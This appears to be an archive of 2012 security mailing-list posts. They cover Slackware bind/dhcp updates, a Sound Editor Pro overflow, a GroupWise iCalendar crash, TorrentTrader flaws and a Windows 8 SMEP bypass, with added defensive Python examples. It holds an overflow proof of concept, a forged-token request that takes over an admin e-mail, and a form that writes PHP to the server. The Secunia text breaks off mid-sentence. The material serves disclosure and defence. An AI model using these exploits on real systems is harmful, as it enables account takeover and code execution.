| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBSlvYACgkQakRjwEAQIjNq4QCfToYaW19I79R748n7LK5gRxdN
VdwAn1gKwMwexSfYJRQNcFTZdT7Ii4ip
=HZF+
-----END PGP SIGNATURE-----
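The ChangeLog entry above states the rule patch 2.7 applies to destination names read from the patch text (CVE-2010-4651): an absolute name, or one containing a ".." component, is skipped unless the user supplied it on the command line. The block below is an added Python illustration of that rule applied to the `+++` headers of a small constructed patch; it is not GNU patch code, and it assumes `-p0` semantics (the header name is used as-is, with no leading components stripped), so names are checked exactly as they appear.

```python
import posixpath
import re

# Constructed sample patch (not from any real project). Only the "+++"
# headers matter for this check; the hunks are minimal placeholders. One
# header also carries the tab-separated timestamp that diff emits.
SAMPLE_PATCH = """\
--- src/main.c.orig
+++ src/main.c
@@ -1 +1 @@
-old
+new
--- /etc/hosts.orig
+++ /etc/hosts
@@ -1 +1 @@
-old
+new
--- ../../etc/shadow.orig
+++ ../../etc/shadow\t2012-09-14 10:00:00.000000000 +0000
@@ -1 +1 @@
-old
+new
--- docs/../README.orig
+++ docs/../README
@@ -1 +1 @@
-old
+new
"""

# The destination name is the first whitespace-delimited token after "+++ ".
HEADER = re.compile(r"^\+\+\+ (\S+)", re.MULTILINE)


def is_safe_patch_target(name):
    """The rule from the patch 2.7 ChangeLog: a destination taken from the
    patch text is applied only if it is relative and has no '..' component.
    (Names given on the command line are exempt, so this is applied only to
    names parsed from the patch, never to user-supplied ones.)"""
    if not name:
        return False
    if posixpath.isabs(name):
        return False
    # Split on the separator so "docs/../README" is rejected while a file
    # legitimately named "..foo" (a single component) is not.
    return ".." not in name.split("/")


def classify_patch_targets(patch_text):
    """Map every '+++' destination in the patch to True (would be applied)
    or False (would be skipped under the rule above)."""
    return {m.group(1): is_safe_patch_target(m.group(1)) for m in HEADER.finditer(patch_text)}


if __name__ == "__main__":
    for name, ok in classify_patch_targets(SAMPLE_PATCH).items():
        print("apply" if ok else "skip ", name)
```

Rejecting on path components rather than on the substring ".." is deliberate: the substring test would also refuse harmless names, and a substring test on "/" alone would miss the relative traversal case that the fourth header shows.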
[slackware-security] bind (SSA:2012-257-01)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  bind (SSA:2012-257-01)

New bind packages are available for Slackware 12.1, 12.2, 13.0, 13.1,
13.37, and -current to fix a security issue.

Here are the details from the Slackware 13.37 ChangeLog:
+--------------------------+
patches/packages/bind-9.7.6_P3-i486-1_slack13.37.txz:  Upgraded.
  This update fixes a security issue where named could crash on a
  specially crafted record.  [RT #30416]
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 12.1:
ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.7.6_P3-i486-1_slack12.1.tgz

Updated package for Slackware 12.2:
ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/bind-9.7.6_P3-i486-1_slack12.2.tgz

Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.7.6_P3-i486-1_slack13.0.txz

Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.0.txz

Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.7.6_P3-i486-1_slack13.1.txz

Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.1.txz

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.7.6_P3-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.37.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.9.1_P3-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.9.1_P3-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 12.1 package:
938f69331ed3a3b899a389b32c9146c2  bind-9.7.6_P3-i486-1_slack12.1.tgz

Slackware 12.2 package:
c8298568f3ced83874a6249f4d6837e2  bind-9.7.6_P3-i486-1_slack12.2.tgz

Slackware 13.0 package:
f2d5fe887610219c470dbeca820be1bd  bind-9.7.6_P3-i486-1_slack13.0.txz

Slackware x86_64 13.0 package:
0bc9402be113069e2a739a9d67ce2e4a  bind-9.7.6_P3-x86_64-1_slack13.0.txz

Slackware 13.1 package:
7a07e7258b644f9563ced540dfebde95  bind-9.7.6_P3-i486-1_slack13.1.txz

Slackware x86_64 13.1 package:
3bfac2cd06c9414f802e8196b01f5b0a  bind-9.7.6_P3-x86_64-1_slack13.1.txz

Slackware 13.37 package:
d8bb47c0239269a4bc50abe239b08f17  bind-9.7.6_P3-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
120ce7a68696d1328ee9ab0f23e370fc  bind-9.7.6_P3-x86_64-1_slack13.37.txz

Slackware -current package:
b2b7ba05349ad9aa1ef8ebd110132d3e  n/bind-9.9.1_P3-i486-1.txz

Slackware x86_64 -current package:
97b2b2ccbbc22e91c0a7451f4d25c1ae  n/bind-9.9.1_P3-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg bind-9.7.6_P3-i486-1_slack13.37.txz

Then, restart the name server:
# /etc/rc.d/rc.bind restart

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBSluMACgkQakRjwEAQIjOb4gCfaO1KUFx64eMxAD1r9MjPPQGB
/00An0pVuozd1u+Z+cHR6Q2QONDlYNda
=tAm8
-----END PGP SIGNATURE-----
[slackware-security] dhcp (SSA:2012-258-01)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  dhcp (SSA:2012-258-01)

New dhcp packages are available for Slackware 12.1, 12.2, 13.0, 13.1,
13.37, and -current to fix a security issue.

Here are the details from the Slackware 13.37 ChangeLog:
+--------------------------+
patches/packages/dhcp-4.2.4_P2-i486-1_slack13.37.txz:  Upgraded.
  An issue with the use of lease times was found and fixed. Making
  certain changes to the end time of an IPv6 lease could cause the server
  to abort. Thanks to Glen Eustace of Massey University, New Zealand for
  finding this issue. [ISC-Bugs #30281]
  For more information, see:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 12.1:
ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack12.1.tgz

Updated package for Slackware 12.2:
ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack12.2.tgz

Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack13.0.txz

Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/dhcp-4.1_ESV_R7-x86_64-1_slack13.0.txz

Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack13.1.txz

Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/dhcp-4.1_ESV_R7-x86_64-1_slack13.1.txz

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/dhcp-4.2.4_P2-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/dhcp-4.2.4_P2-x86_64-1_slack13.37.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dhcp-4.2.4_P2-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/dhcp-4.2.4_P2-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 12.1 package:
eb9eb46069d67590e3e07029a4a71d07  dhcp-4.1_ESV_R7-i486-1_slack12.1.tgz

Slackware 12.2 package:
fca847eea77fc1d63f39abd7508c894b  dhcp-4.1_ESV_R7-i486-1_slack12.2.tgz

Slackware 13.0 package:
4ca418335fbedb6806c37a18ee82a3a1  dhcp-4.1_ESV_R7-i486-1_slack13.0.txz

Slackware x86_64 13.0 package:
55e54c1a7d15ffb9fbe060e91308140b  dhcp-4.1_ESV_R7-x86_64-1_slack13.0.txz

Slackware 13.1 package:
af60f47b8f903a0bf3465bb6975ad596  dhcp-4.1_ESV_R7-i486-1_slack13.1.txz

Slackware x86_64 13.1 package:
08721f29288b9420a9807da752333673  dhcp-4.1_ESV_R7-x86_64-1_slack13.1.txz

Slackware 13.37 package:
c89162e707c91d1c01530334ec504da8  dhcp-4.2.4_P2-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
2f8c5d72bf67eeffb73a9e7dc8fb0d36  dhcp-4.2.4_P2-x86_64-1_slack13.37.txz

Slackware -current package:
74b7290a3d2a8b1c5beef845f0d9b756  n/dhcp-4.2.4_P2-i486-1.txz

Slackware x86_64 -current package:
71e9db99927cf7fece9dd137a2bb0c23  n/dhcp-4.2.4_P2-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg dhcp-4.2.4_P2-i486-1_slack13.37.txz

Then, restart the dhcp daemon.

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBTlwQACgkQakRjwEAQIjOKngCfUfJA6x85nf5DamV/XKUvLxLa
+D4AnjsMSZFdiBdxQ6T4qIqXiW5DXC3R
=CBrL
-----END PGP SIGNATURE-----
IPv6 Toolkit v1.2.3 released! (and upcoming IPv6 security trainings)
Folks,

I realize we never announced the toolkit on these lists, so here you go.

** SI6 Networks' IPv6 toolkit **

We've released SI6 Networks' IPv6 toolkit v1.2.3. It is available at:
http://www.si6networks.com/ipv6toolkit.

The toolkit contains a number of IPv6 security/troubleshooting tools, such as:

* An IPv6 local network scanner (scan6)
* An IPv6 fragmentation attack/assessment tool (frag6)
* A tool to craft arbitrary TCP/IPv6 segments (tcp6)
* A tool to craft arbitrary Router Advertisements (ra6)

and many, many others.

This version of the toolkit has been fully ported to Mac OS (the list of
supported systems now including, at the very least, FreeBSD, NetBSD, OpenBSD,
Linux, and Mac OS), and also incorporates a number of patches sent by the
community.

Any feedback on the tools will be welcome (either unicast to me, or to the
ipv6hackers mailing-list: http://lists.si6networks.com/listinfo/ipv6hackers/).

** IPv6 security trainings **

Development of the IPv6 toolkit is partially supported through our IPv6
security trainings: http://www.hackingipv6networks.com. Please consider
attending one of our trainings.

The list of already-scheduled trainings can be found at:
http://www.hackingipv6networks.com/upcoming-t, and currently includes
trainings in Ghent (Belgium), Lisbon (Portugal), and Rio de Janeiro (Brazil).

Please follow us on Twitter to get the latest news about the IPv6 Toolkit and
IPv6 security: @SI6Networks

Thanks!

Best regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
[IA38] NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow
Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product:        Sound Editor Pro v7.5.1
Vendor URL:     www.soundeditorpro.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2012-08-15
Date published: 2012-09-16
CVSSv2 Score:   6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
CVE:            -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.

3. VERSIONS AFFECTED
--------------------
NCMedia Sound Editor Pro v7.5.1, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
A Local Buffer Overflow Vulnerability has been found in NCMedia Sound Editor
Pro v7.5.1.

The application saves the paths of all recently used files in a file called
MRUList201202.dat in the directory %appdata%\Sound Editor Pro\. When the
"File" menu item is clicked, the application reads the contents of that file,
but does not validate the length of the string loaded from the file before
copying it into a fixed-size buffer, which leads to a Stack-based Buffer
Overflow.

An attacker needs to force the victim to place an arbitrary
MRUList201202.dat file into the target directory.

5. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
#!/usr/bin/python
# Writes an MRUList201202.dat whose single entry is far longer than the
# application expects: 4124 bytes of filler, a 4-byte marker, 100 trailing bytes.
file = "MRUList201202.dat"
junk1 = "\x41" * 4124
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 100
poc = junk1 + boom + junk2

try:
    print("[*] Creating exploit file...\n")
    with open(file, "w") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except IOError:
    print("[!] Error while creating file!")

For further screenshots and/or PoCs visit:
http://security.inshell.net/advisory/38

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2012-08-15: Initial notification sent to vendor
2012-08-22: No response, second notification sent to vendor
2012-08-29: No response, third notification sent to vendor
2012-09-16: No response
2012-09-16: Full Disclosure according to disclosure policy

8. REFERENCES
-------------
http://security.inshell.net
Secunia Research: Novell GroupWise iCalendar Date/Time Parsing Denial of Service
======================================================================

                     Secunia Research 17/09/2012

     - Novell GroupWise iCalendar Date/Time Parsing Denial of Service -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Novell GroupWise 8.0.2 HP3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  Remote

======================================================================
3) Vendor's Description of Software

"Novell GroupWise 8 gives you a wide range of collaborative tools to
create a truly plugged in work environment."

Product Link:
http://www.novell.com/products/groupwise/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Novell GroupWise,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Novell GroupWise includes the GroupWise Internet Agent (GWIA), which is
responsible for exchanging e-mail messages between GroupWise and the
Internet via e.g. IMAP4, POP3, and SMTP. The GroupWise Internet Agent
also supports parsing of iCalendar data, which is implemented in g1.dll.

The iCalendar format is used to exchange calendar information and is
comprised of various groupings of component properties. Some of these
properties may include date-time information, which can e.g. be
specified via the "TZID" parameter of a "DTSTART" property in a
"VTIMEZONE" component.

Date-Time information is formatted as: [date]T[time] where [date] is 8
characters and [time] is 6 characters (e.g. 20120915T23 means
September 15th, 2012 at 11 PM).

NgwiCalTimeProperty::datetime() in g1.dll is responsible for parsing
date-time information. When called, the function in turn calls
NgwiCalTimeProperty::date() to parse the date in the date-time string.
Upon exiting, NgwiCalTimeProperty::date() returns a pointer to offset 8
into the date-time string (i.e. where the 'T' and following time
information is expected to be).

This returned pointer is then dereferenced in order to evaluate whether
the referenced character is 'T' and parse the expected time
information. However, no checks are performed by the function to ensure
that the supplied date-time string is longer than 8 characters. This
may result in an out-of-bounds read access violation, causing GWIA to
crash in case a shorter date-time string was supplied via e.g. an
e-mail with a specially crafted .ics attachment.

======================================================================
5) Solution

Update to version 8.0 Support Pack 3 or later.

======================================================================
6) Time Table

20/10/2011 - Vendor notified.
20/10/2011 - Vendor response.
21/12/2011 - Vendor asks for additional information.
21/12/2011 - Clarification provided to the vendor.
21/12/2011 - Vendor response.
08/03/2012 - Vendor provides status update.
18/05/2012 - Vendor provides status update.
29/06/2012 - Status update requested.
29/06/2012 - Vendor provides status update.
06/08/2012 - Vendor provides status update.
13/09/2012 - Vendor provides status update.
14/09/2012 - Vendor provides status update.
17/09/2012 - Public disclosure.

======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2011-3827 for the vulnerability.

Novell:
http://www.novell.com/support/kb/doc.php?id=7010767

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a
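The advisory's root cause is a parser that consumes the 8-character date and then reads offset 8 for the 'T' without first checking that the string is that long. The following is an added example in Python, not code from Secunia or from Novell's g1.dll, showing the same date-then-time split with the length check in place: an 8-character value is treated as a bare DATE, a shorter or malformed value is rejected with a clean error, and a small scanner flags offending date/time properties in a constructed .ics sample. It goes a little beyond the advisory by also validating calendar and clock ranges (property names, the sample file and the error type are this example's own).

```python
"""Bounded parser for iCalendar DATE / DATE-TIME values.

Constructed example in Python, not Novell's g1.dll code: it follows the same
split the advisory describes (parse the 8-character date, then look at
offset 8 for 'T') but checks the length before every index.
"""
import re
from datetime import date


class ICalValueError(ValueError):
    """Raised for any malformed value instead of letting an IndexError escape."""


def _parse_date_prefix(value):
    """Consume the 8-digit DATE at the start of value; return ((y, m, d), rest)."""
    if not isinstance(value, str) or len(value) < 8 or not re.fullmatch(r"[0-9]{8}", value[:8]):
        raise ICalValueError("DATE needs 8 digits: %r" % (value,))
    y, m, d = int(value[:4]), int(value[4:6]), int(value[6:8])
    try:
        date(y, m, d)           # rejects month 13, 31 Feb, year 0000, ...
    except ValueError:
        raise ICalValueError("not a calendar date: %r" % value[:8])
    return (y, m, d), value[8:]


_TIME_RE = re.compile(r"([0-9]{2})([0-9]{2})([0-9]{2})(Z?)")


def parse_datetime(value):
    """Parse a DATE or DATE-TIME value.

    Returns (year, month, day, hour, minute, second, utc); the time fields are
    None for a bare DATE. Never reads past the end of the string."""
    ymd, rest = _parse_date_prefix(value)
    if rest == "":
        # Exactly 8 characters: a bare DATE. This is the length at which the
        # unchecked code in the advisory would read one byte beyond the string.
        return ymd + (None, None, None, False)
    if rest[0] != "T":
        raise ICalValueError("expected 'T' at offset 8: %r" % (value,))
    m = _TIME_RE.fullmatch(rest[1:])
    if m is None:
        raise ICalValueError("TIME needs 6 digits after 'T': %r" % (value,))
    hh, mm, ss = int(m.group(1)), int(m.group(2)), int(m.group(3))
    if hh > 23 or mm > 59 or ss > 60:       # 60 permits a leap second
        raise ICalValueError("time out of range: %r" % (value,))
    return ymd + (hh, mm, ss, m.group(4) == "Z")


def is_valid_datetime(value):
    try:
        parse_datetime(value)
        return True
    except ICalValueError:
        return False


# Property names whose value is a DATE/DATE-TIME (EXDATE may be a comma list).
_DT_PROPS = {"DTSTART", "DTEND", "DTSTAMP", "DUE", "RECURRENCE-ID", "EXDATE"}


def check_ics(text):
    """Return [(line, reason)] for every date/time property that would not parse.

    Handles 'NAME;PARAM=...:VALUE' lines such as DTSTART;TZID=...:VALUE."""
    problems = []
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.split(";", 1)[0].upper() in _DT_PROPS:
            for item in value.split(","):
                try:
                    parse_datetime(item.strip())
                except ICalValueError as exc:
                    problems.append((line, str(exc)))
    return problems


# Constructed sample: one DTSTART carries the 11-character value from the advisory.
SAMPLE_ICS = """BEGIN:VCALENDAR
BEGIN:VTIMEZONE
TZID:Europe/Copenhagen
BEGIN:STANDARD
DTSTART:19961027T030000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20120915T120000Z
DTSTART;TZID=Europe/Copenhagen:20120915T23
DTEND;TZID=Europe/Copenhagen:20120916T000000
END:VEVENT
END:VCALENDAR
"""

if __name__ == "__main__":
    for line, reason in check_ics(SAMPLE_ICS):
        print("rejected: %s  (%s)" % (line, reason))
```

A mail gateway that applies `check_ics` to .ics attachments before handing them to the calendar parser can quarantine malformed values rather than letting the parser decide how to fail; the same length-before-index discipline is what the native fix has to implement.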
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
=====================================================================

Author: Janek Vind "waraxe"
Date: 17. September 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-89.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
BitTorrent tracker. Featuring integrated forums, and plenty of administration
options.

http://sourceforge.net/projects/torrenttrader/
http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/

###########################################################################
1. Unauthorized Email Change in account-ce.php
###########################################################################

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

--[ source code start ]--
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec))
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = " . sqlesc($email) . " WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
--[ source code end ]--

Tests:

Let's find the md5 hash of the email "t...@test.com", which is
b642b4217b34b1e8d3bd915fc65c4452. Target user ID is 1. We issue the GET
request:

http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=t...@test.com

A quick look at the database confirms that the email address of the user with
ID 1 has indeed been changed. The next logical move for an attacker is a
password recovery request:

http://localhost/torrenttrader208/account-recover.php

After admin account takeover the attacker is able to use the next
vulnerability, described below, which may allow PHP remote code execution.

###########################################################################
2. Arbitrary file creation / directory traversal in nfo-edit.php
###########################################################################

Reason: failure to properly sanitize user submitted data
Attack vector: user submitted POST parameters "id" and "content"
Preconditions:
  1. nfo-file editing privileges needed (usually admin)
  2. PHP must be < 5.3.4 for null-byte attacks to work
Result:
  1. attacker is able to write remote files with arbitrary content
  2. directory traversal vulnerability allows bypassing path restrictions

--[ source code start ]--
$id = (int)$_GET["id"] ? $_GET["id"] : $_POST["id"];
$do = $_POST["do"];
$nfo = $site_config["nfo_dir"] . "/$id.nfo";
if ($do == "update") {
    if (file_put_contents($nfo, $_POST["content"])) {
        write_log("NFO ($id) was updated by $CURUSER[username].");
--[ source code end ]--

Test: first we need an html form like the one below:

<html><body><center>
<form action="http://localhost/torrenttrader208/nfo-edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="do" value="update">
<input type="hidden" name="id" value="test.php">
<input type="hidden" name="content" value="<?php phpinfo();?>">
<input type="submit" value="Test">
</form></center></body></html>

Log in as admin and then make the POST request by clicking the "Test" button.
We should see "NFO Updated" as the response and can confirm the new file's
existence:

http://localhost/torrenttrader208/uploads/test.php.nfo

By using a null byte (\0) it's possible to write files with an arbitrary
extension. Finally, it is possible to make use of directory traversal strings
"../" and write files to an arbitrary location on the remote server.

###########################################################################
3. Username Enumeration Vulnerability in account-login.php
###########################################################################

Reason: different error messages for invalid username and invalid password
Attack vector: user submitted POST parameters "username" and "password"
Preconditions: none
Result: attacker can enumerate valid usernames

--[ source code start ]--
if (!empty($_POST["username"]) && !empty($_POST["password"])) {
    $res = SQL_Query_exec("SELECT id, password, secret, status, enabled FROM users WHERE username = " . sqlesc($_POST["username"]) . "");
    $row = mysql_fetch_array($res);
    if (!$row)
        $message = T_("USERNAME_INCORRECT");
    elseif ($row["status"] == "pending")
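Sections 1 and 2 above share one defect: a value is trusted without first checking that it is in the state the code assumes. In account-ce.php, `editsecret` is '' for any account that never requested a change, so `md5($sec . $email . $sec)` degenerates to `md5($email)`, which is exactly the token the advisory's test supplies; in nfo-edit.php the `(int)` cast only decides the ternary, and the raw POST value is what ends up in the path. The block below is an added example in Python, not TorrentTrader's code, that places each vulnerable check beside a hardened one: the e-mail change refuses when no secret is pending, uses a keyed hash and a constant-time compare, and is single-use; the NFO path accepts only a decimal id and confines the result to the NFO directory. The in-memory `users` dict, `NFO_DIR` and all sample values are constructed stand-ins for the MySQL table and `$site_config['nfo_dir']`.

```python
"""Hardened versions of two checks from the TorrentTrader 2.08 advisory.

Constructed example: an in-memory dict stands in for the `users` table and
NFO_DIR stands in for $site_config['nfo_dir']; neither is TorrentTrader code.
"""
import hashlib
import hmac
import os
import re
import secrets

# --- 1. account-ce.php: confirming an e-mail change -------------------------

def make_users():
    """Constructed sample rows: nobody has a change pending (editsecret '')."""
    return {
        1: {"email": "admin@example.invalid", "editsecret": ""},
        2: {"email": "bob@example.invalid", "editsecret": ""},
    }

def forged_token(new_email):
    """What an attacker computes against the original check: md5('' . email . '')."""
    return hashlib.md5(new_email.encode()).hexdigest()

def vulnerable_confirm_email(users, user_id, token, new_email):
    """Same logic as the advisory's account-ce.php: md5(sec . email . sec).

    With editsecret '' the expected token is just md5(new_email), so the
    comparison proves nothing about who is asking."""
    row = users.get(user_id)
    if row is None:
        return False
    sec = row["editsecret"]
    if token != hashlib.md5((sec + new_email + sec).encode()).hexdigest():
        return False
    row["email"], row["editsecret"] = new_email, ""
    return True

def _change_token(sec, new_email):
    # Keyed hash over the new address; the key never leaves the server.
    return hmac.new(sec.encode(), new_email.encode(), hashlib.sha256).hexdigest()

def request_email_change(users, user_id, new_email):
    """Store a fresh random secret and return the token that would be mailed."""
    sec = secrets.token_hex(16)
    users[user_id]["editsecret"] = sec
    return _change_token(sec, new_email)

def hardened_confirm_email(users, user_id, token, new_email):
    row = users.get(user_id)
    if row is None or not isinstance(token, str):
        return False
    sec = row["editsecret"]
    # An empty secret means no change was requested: refuse instead of hashing it.
    if not sec:
        return False
    # Constant-time comparison; a mismatch leaks nothing about the right token.
    if not hmac.compare_digest(token.encode(), _change_token(sec, new_email).encode()):
        return False
    row["email"], row["editsecret"] = new_email, ""   # single use
    return True

# --- 2. nfo-edit.php: building the path of the NFO file to write ------------

NFO_DIR = "/var/www/torrenttrader208/uploads"   # stand-in for $site_config['nfo_dir']

def vulnerable_nfo_path(raw_id):
    """Original behaviour: the raw id is concatenated, so "test.php" or
    "../x" pass straight through into the file name."""
    return NFO_DIR + "/" + raw_id + ".nfo"

def safe_nfo_path(raw_id):
    """Accept only a decimal torrent id and confine the result to NFO_DIR."""
    if not isinstance(raw_id, str) or re.fullmatch(r"[0-9]{1,18}", raw_id) is None:
        raise ValueError("nfo id must be a decimal integer")
    base = os.path.realpath(NFO_DIR)
    path = os.path.realpath(os.path.join(base, "%d.nfo" % int(raw_id)))
    # Belt and braces: the resolved path must still sit under the nfo dir.
    if os.path.commonpath([base, path]) != base:
        raise ValueError("nfo path escapes the nfo directory")
    return path

def nfo_id_accepted(raw_id):
    try:
        safe_nfo_path(raw_id)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    users = make_users()
    forged = forged_token("attacker@example.invalid")
    print("vulnerable accepts forged token:",
          vulnerable_confirm_email(users, 1, forged, "attacker@example.invalid"))
    users = make_users()
    print("hardened accepts forged token:",
          hardened_confirm_email(users, 1, forged, "attacker@example.invalid"))
    for candidate in ("42", "test.php", "../../etc/x", "42\0.php"):
        print(repr(candidate), "->", nfo_id_accepted(candidate))
```

The regular expression check on the id is the fix that matters for the null-byte and traversal cases; the `commonpath` check is there so that a later change to how the file name is built cannot silently reopen the traversal.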
[Positive Research] Intel SMEP overview and partial bypass on Windows 8 (whitepaper)
Intel SMEP overview and partial bypass on Windows 8 (whitepaper).

...

It is natural to conclude that if you can't store your shellcode in user mode,
you have to find a way to store it somewhere in the kernel space. The most
obvious solution is using Windows objects such as WinAPI (Events, Timers,
Sections etc.) or GDI (Brushes, DCs etc.). They are accessed indirectly from
user mode via WinAPI that uses system calls. The point is that the object body
is kept in the kernel and somehow some object fields can be modified from user
mode, so an attacker can transfer the needed shellcode bytes from user-mode
memory to kernel mode.

...

---[ Full details ]---

---[ Blog
http://blog.ptsecurity.com/2012/09/intel-smep-overview-and-partial-bypass.html

---[ Whitepapers
English version (PDF):
http://www.ptsecurity.com/download/SMEP_overview_and_partial_bypass_on_Windows_8.pdf
Russian version (PDF):
http://www.ptsecurity.ru/download/Technology_Overview_Intel_SMEP_and_partial_bypass_on_Windows_8.pdf

Thx!

- AShishkin[at]ptsecurity[dot]ru
http://www.ptsecurity.com
http://blog.ptsecurity.com
http://www.phdays.com